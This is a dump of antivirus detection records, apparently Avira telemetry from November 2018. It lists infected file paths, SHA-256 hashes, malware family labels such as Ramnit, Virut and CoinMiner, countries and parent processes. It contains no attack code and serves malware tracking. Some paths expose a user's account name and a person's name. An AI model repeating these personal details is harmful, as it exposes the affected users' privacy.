  Row(detection=Row(filename='avscan-20181101-082112-b470c72c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d15830c6\\AVSCAN-20181101-081149-80057893\\AVSCAN-20181101-082112-B470C72C', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='6aebd1d925b21a9928f8c876c1b660c171ffac9f1875be9e26d8c786cbe688dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T07:21:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='h5_mapeditor.exe', filepath='H:\\Might And Magic V Hammers Of Fate\\bina1\\H5_MapEditor.exe', filesize=17408000, name='W32/Ramnit.CD.#M1.#R1'), hash='97cc1d47bbcafb61b42f27e4f2f49169a61cde004ab91f310afe6fbfeb863401', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Internet Explorer\\iexplore.exe', parentsize=815304, timestamp='2018-11-01T14:45:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-120949-1f137fe8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-120927-0BCADB2A\\AVSCAN-20181101-120949-1F137FE8', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:09:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wuauserv.exe', filepath='C:\\Windows\\SysWOW64\\drivers\\UMDF\\tr-KL\\wuauserv.exe', filesize=448000, name='W32/Hlubea.Z.#M1.#R1'), hash='927986f56707e3dfe2adca5e4224417a764405e155f4ac1e60ddf7b6085c8c2c', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T04:56:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msiexec64.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\ClipBoardSvc\\MSieXEc64.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:34:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='hl.exe', filepath='\\\\?\\D:\\Games\\Counter-Strike Global Offensive 1.0\\hl.exe', filesize=5888000, name='SPR/GameHack.6980e9.#M1.#R1'), hash='6980e96106136eb42b4248e91bea4f08b08c5ec3a21151e9513d02edf45a74ae', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:53:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-193723-cb99228f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_95441a07\\AVSCAN-20181101-193703-C897B155\\AVSCAN-20181101-193723-CB99228F', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:34:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='rdrleakdiag.exe', filepath='G:\\Windows\\System32\\rdrleakdiag.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='4ea40fc1624894f0b1fd2d8eb2571a1af32b523dcf3c87d8d2ae84e44166828c', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1744896, timestamp='2018-11-01T01:50:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ZA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T23:22:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='82fc65dca610a1c90edae8f1c08b43f52e80552cc42b53569d81cb037a6f32d6', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T21:00:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.091\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.091\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T16:59:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T22:20:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~1a02f2cb.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~1a02f2cb.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='413fe9a5c16921a255eb2eca53d943c08089ac54b246501d5424ce0b27341c2d', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-01T03:57:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-185524-13a8e14e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_bc28c19b\\AVSCAN-20181101-185421-0B9CD5F6\\AVSCAN-20181101-185524-13A8E14E', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:55:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autorun.exe', filepath='d:\\autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T11:03:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='downloadtool.exe', filepath='\\\\?\\H:\\New folder\\M10F MODIFICATIONS1\\CABLE\\M10F_OpenCPU_GS4_SDK_V1.2\\downtools\\QFlash_V3.3\\QFlash_V3.3\\INT\\CH1\\DownloadTool.exe', filesize=1664000, name='W32/Neshta.A.#M1.#R1'), hash='6c336549c11ddbceea4742bf8d3a617da78d9fd71232eb6209ce42458b00cac4', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:46:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-200326-52e974c3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_247167c2\\AVSCAN-20181101-200054-3CCB494F\\AVSCAN-20181101-200326-52E974C3', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T19:03:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp000a8ece', filepath='C:\\Windows\\Temp\\tmp00000296\\tmp000a8ece', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T10:49:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-214949-68c80945', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ce119106\\AVSCAN-20181101-214829-5D8C5858\\AVSCAN-20181101-214949-68C80945', filesize=768000, name='TR/Dldr.Zampol.75e966.#M1.#R1'), hash='75e9662275fd9a5eeb9c632ff17ca43dba27480b6123c70517609ebb6e0d51e1', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:49:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='user.exe16', filepath='J:\\PCem EMULATORi\\WineVDM\\16bit apps\\otvdm-v0.5.0a\\dll\\user.exe16', filesize=384000, name='HEUR/APC.#M1.#R1'), hash='4ad1319a417734b89c64dfc07fa9087a256486fe7f4fe420da9b94d22ff14fe6', metadata=Row(cmdline='\\\\\\"J:\\\\\\\\PCem EMULATORi\\\\\\\\WineVDM\\\\\\\\16bit apps\\\\\\\\otvdm-v0.5.0a\\\\\\\\CALC.EXE\\\\\\"', country='RS', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='J:\\PCem EMULATORi\\WineVDM\\16bit apps\\otvdm-v0.5.0a\\otvdmw.exe', parentsize=19968, timestamp='2018-11-01T00:52:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T16:19:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160322-df4ca55e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_20bba27a\\AVSCAN-20181101-160132-3B6207F7\\AVSCAN-20181101-160322-DF4CA55E', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:03:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Downloads\\Setup\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\Setup\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T23:45:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T01:32:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa5780.15260\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='LK', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa5780.15260\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T23:40:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='328fbbeb694428d090ff636b4a94c2528138cd1cc8f3c6766684699d8552e6ae', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-35\\328FBBEB694428D090FF636B4A94C2528138CD1CC8F3C6766684699D8552E6AE', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='328fbbeb694428d090ff636b4a94c2528138cd1cc8f3c6766684699d8552e6ae', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:13:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-101921-ec7a0b78', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1484d0d6\\AVSCAN-20181101-101728-D6C4F3BF\\AVSCAN-20181101-101921-EC7A0B78', filesize=1024000, name='ADWARE/Adware.Gen7.#M1.#R1'), hash='48d0191d0dd40ea4e9d0197017cf9cae8a1630162a38392829005adc050e5fad', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T02:19:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='devcon.exe', filepath='C:\\Program Files\\PowerISO\\devcon.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='5b3815d5e22a56239c63a08587d4acebae5e9ce21ae671295d9f0a79a810cca0', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:MAxLNBM2rUqJdEWN.1', country='ES', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=122560, timestamp='2018-11-01T19:22:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cae8e744aef46779873844c5a4e2e388c78494a08167ef766ad7f668a7aa7697', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-32\\CAE8E744AEF46779873844C5A4E2E388C78494A08167EF766AD7F668A7AA7697', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='cae8e744aef46779873844c5a4e2e388c78494a08167ef766ad7f668a7aa7697', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T15:09:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-162609-92490caf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_44a5bd87\\AVSCAN-20181101-162429-83456BF7\\AVSCAN-20181101-162609-92490CAF', filesize=2216000, name='PUA/Softcnapp.#M1.#R1'), hash='d459c3ef5011147cda165096d073d3ff14cb504ed1abc1f88638508c4705b41c', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:26:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-151824-5feaf75f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-151824-5FEAF75F', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:18:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avlxsbdd.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\AvLxsBdd.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wunregbean.exe', filepath='C:\\Program Files\\IBM\\SQLLIB\\java\\jdk\\jre\\bin\\wunregbean.exe', filesize=128000, name='W32/Infector.Gen.#M300.#R7863'), hash='ec841e835f38110c52481ffa2b6cffacda73fa2d861644225989a32cc3870d70', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T05:12:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-151037-0688fed0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-151037-0688FED0', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:10:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-162406-61584e8c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1ee96c37\\AVSCAN-20181101-161809-45A9D8A6\\AVSCAN-20181101-162406-61584E8C', filesize=4736000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='ba789b44e57d3290f318976715911d975db6e5d50822bbcd421524f1876af1d6', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T13:21:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\miha4wkzfaa\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T12:53:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='reclmxky.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\RecLmXkY.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:01:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-212942-213b18d6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-212942-213B18D6', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:30:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-093927-c5170284', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-093927-C5170284', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:39:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-145853-7f99591c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-145853-7F99591C', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:59:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='attestati.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\DOCENZE\\CORSO CARVICO\\ATTESTATI.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:22:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-151429-33039e5b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-151429-33039E5B', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:14:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pellegrini samantha.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\ENGIM2014-2015\\engim varie\\STAGE 574309\\PELLEGRINI SAMANTHA.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:28:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152359-4c895f4a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_642cd325\\AVSCAN-20181101-152303-41C8AB8B\\AVSCAN-20181101-152359-4C895F4A', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='be458c71411a96a3c8b0e010203665e37b3ec2700f94c837e24d0cf7b63cb5e1', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:23:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152338-9c16f12f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-152338-9C16F12F', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:23:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-212927-1f0d979a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-212927-1F0D979A', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:29:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\2cfy54hqcoe\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1541067473.5bdad2d1cfb80', country='PS', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Free\\482605833.exe', parentsize=671232, timestamp='2018-11-01T10:18:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcoded_000', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\Transcoded_000', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='e3e9856fceaf2e00244e8dea7ca6ec30b76af573e21cd489c56aee73f5ca45d5', metadata=Row(cmdline=None, country='PT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T22:04:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\3mnufzljt0n\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:01:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='downloads.exe', filepath='C:\\Users\\X\\Downloads\\Downloads.exe', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='be458c71411a96a3c8b0e010203665e37b3ec2700f94c837e24d0cf7b63cb5e1', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:39:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181104-183851-b590b404', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_72963e46\\AVSCAN-20181104-183820-B0C7F804\\AVSCAN-20181104-183851-B590B404', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='HR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:38:55Z'), dt=datetime.date(2018, 11, 4)),
